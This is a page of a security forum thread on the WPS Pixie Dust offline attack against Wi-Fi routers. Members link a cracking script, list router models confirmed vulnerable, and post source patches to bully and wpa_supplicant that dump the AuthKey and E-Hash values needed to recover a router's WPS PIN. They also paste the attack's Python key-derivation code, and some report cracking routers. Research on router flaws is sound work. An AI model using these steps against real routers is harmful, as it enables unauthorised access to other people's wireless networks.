Page 8 of 59 FirstFirst ... 6789101858 ... LastLast
Results 71 to 80 of 581

Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #71
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    517
    @everyone There is NO official and complete tool available yet. Stop asking. When it is available, one of us will make a post.

  2. #72
    Senior Member
    Join Date
    Mar 2015
    Posts
    141
    @dudux was the realtek.cap file what you used to make wpsOffline.py? Unless im doing it wrong, Im not getting the same pke, pkr, or any of it.

  3. #73
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    517
    SMCD3GNV and WRT160Nv2 confirmed vulnerable!

  4. #74
    N4 Nethunter
    Guest
    the tool works i have corrected the code now
    @sorox2212

    cracked 3 routers
    and all of them were right

  5. #75
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    517
    Can you post the model numbers, manufacturers, and hardware numbers so I can add it to the database?

  6. #76
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    517
    Dudu has asked me to post a python implementation for Ralink devices! You can get it here: https://bitbucket.org/dudux/wpsoffli...e.py?at=master

    All credits go to dudu! Look at the help section for the arguments. Good luck an post any successes with models here! Thanks!!!!
    Last edited by soxrok2212; 2015-03-26 at 06:52 PM.

  7. #77
    Senior Member
    Join Date
    Mar 2015
    Posts
    141
    Quote Originally Posted by Lisa Chu View Post
    You need to edit the file and put your own data. I dont know where PKR,PKE data is in the packets, thats where im stuck.

    Tryed the tool and is giving me
    Code:
     Trying 00000000
    -> 802.11 deauthentication
    -> 802.11 authentication request
    TIMEOUT!!
    But im trying against Broadcom and not Ralink, as said above Broadcom is not implemented yet.

    I hope guys keep developing this subject, its very interesting but over my personal understanding to put in practice, so ill have to wait.
    Would it be feasible to add a import from cap feature? i guess that would put some testers running. Thanks everyone
    Tried the tool also and it is only giving the same results, but i am trying against an ralink tplink router. Unmodified code does the same.
    Looking through the wireshark logs, it is attempting to authenticate, but the script isn't recognizing it is getting a response, I don't really
    know enough about python to dig into it, more of a perl guy than python. Starting to learn it though. Trying to extract the part in wpscrack.py
    that creates the authkey and feed it what it wants to spit out the authkey, if that's even going to work... From what I am reading about the
    KDK it only partialy makes sense to me.

    Tried the modified version of bully also, just seems to run normaly, trying pins and moving on to the next. Still confused on how this is
    supposed to give the Authkey, which is where I am stuck. I assume it doesn't give it to you automatically, so how do you get it to give
    the authkey?

    I can get everything else as it's in plain sight. I have a couple ralink routers at my disposal to test this on also.

    Code:
    maingroup.add_argument('-ak', '--AuthKey', type=str, nargs='?', help='AuthKey obtained from wireshark')
    I thought it wasn't obtained from wireshark and you had to run it through the KDK... That just confused me even more...

  8. #78
    Senior Member
    Join Date
    Jul 2013
    Location
    United States
    Posts
    517
    WPSCrack.py I guess only works with Atheros wireless adapters. Try this to get more info.. comes from Hack Forums:

    Code:
    int wpa_debug_level = MSG_INFO; // change it to MSG_DEBUG
    
    2: Or, manually add some prints in the (wpa_supplicant) source. Let's take as an example bully (you could try reaver if you wish):
    - Download the zip file. Unzip it.
    - Go to bully-master/src/wps and open wps_common.c with a text editor.
    - Go to line 122 and add something similar (just a print):
    Code:
        os_memcpy(wps->emsk, keys + WPS_AUTHKEY_LEN + WPS_KEYWRAPKEY_LEN,
              WPS_EMSK_LEN);
    
        /****** ADD THIS PART ******/
        printf(" > AuthKey: ");
        int pixiecnt = 0;
        for (; pixiecnt < WPS_AUTHKEY_LEN; pixiecnt++) {
            printf("%02x", *(wps->authkey + pixiecnt));
            if (pixiecnt != WPS_AUTHKEY_LEN - 1) {
                printf(":");
            }
        }
        printf("\n");
        /******/
    
        wpa_hexdump_key(MSG_DEBUG, "WPS: AuthKey",
    
    - Now open wps_registrar.c.
    - Go to line 1719 (inside wps_process_e_hash1 function) and add:
    Code:
        wpa_hexdump(MSG_DEBUG, "WPS: E-Hash1", wps->peer_hash1, WPS_HASH_LEN);
    
        /****** ADD THIS PART ******/
        printf(" > E-Hash1: ");
        int pixiecnt = 0;
        for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) {
            printf("%02x", *(wps->peer_hash1 + pixiecnt));
            if (pixiecnt != WPS_HASH_LEN - 1) {
                printf(":");
            }
        }
        printf("\n");
        /******/
    
        return 0;
    
    - Then in the function below (inside wps_process_e_hash2) add:
    Code:
        wpa_hexdump(MSG_DEBUG, "WPS: E-Hash2", wps->peer_hash2, WPS_HASH_LEN);
    
        /****** ADD THIS PART ******/
        printf(" > E-Hash2: ");
        int pixiecnt = 0;
        for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) {
            printf("%02x", *(wps->peer_hash2 + pixiecnt));
            if (pixiecnt != WPS_HASH_LEN - 1) {
                printf(":");
            }
        }
        printf("\n");
        /******/
    
        return 0;
    Then please post this here:

    Code:
    AP Manufacturer:
    Model name/number:
    Chipset: 
    
    N1 Nonce: 
    Authkey: 
    PKE: 
    PKR: 
    E-Hash1: 
    E:Hash2:
    First 3 are optional, last 6 are mandatory to crack.
    Last edited by soxrok2212; 2015-03-26 at 09:20 PM.

  9. #79
    Junior Member
    Join Date
    Apr 2014
    Posts
    8
    Yeah authkey is generated, sorry I just copied&pasted.........

    The code is right here. I guess that the community will release a fresh & quick patch for reaver or bully. Be patient and try to understand the flaw itself!

    Code:
        def gen_keys(self):
            pubkey_enrollee  = self.bignum_unpack(self.PK_E)
            pubkey_registrar = pow(2, self.secret_number, self.prime_int)
            shared_key       = self.bignum_pack(pow(pubkey_enrollee, self.secret_number, self.prime_int), 192)
    
            self.PK_R        = self.bignum_pack(pubkey_registrar, 192)        
            self.RNonce      = os.urandom(16)
            DHKey            = hashlib.sha256(shared_key).digest()
            KDK              = hmac.new(DHKey, self.ENonce + self.EnrolleeMAC + self.RNonce, hashlib.sha256).digest()
            self.AuthKey, self.KeyWrapKey, self.EMSK = self.kdf(KDK, 'Wi-Fi Easy and Secure Key Derivation', [256, 128, 256])
    
            self.R_S1 = '\00' * 16 #random enough
            self.R_S2 = '\00' * 16        
    
            self.PSK1   = hmac.new(self.AuthKey, self.pin[0:4], hashlib.sha256).digest()[:16]
            self.PSK2   = hmac.new(self.AuthKey, self.pin[4:8], hashlib.sha256).digest()[:16]       
            self.RHash1 = hmac.new(self.AuthKey, self.R_S1 + self.PSK1 + self.PK_E + self.PK_R, hashlib.sha256).digest()
            self.RHash2 = hmac.new(self.AuthKey, self.R_S2 + self.PSK2 + self.PK_E + self.PK_R, hashlib.sha256).digest()
    Last edited by dudux; 2015-03-26 at 10:32 PM.

  10. #80
    Junior Member
    Join Date
    Aug 2014
    Posts
    3
    Thanks for the script Dudux, worked for me on a belkin F5D8236-4 v3.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •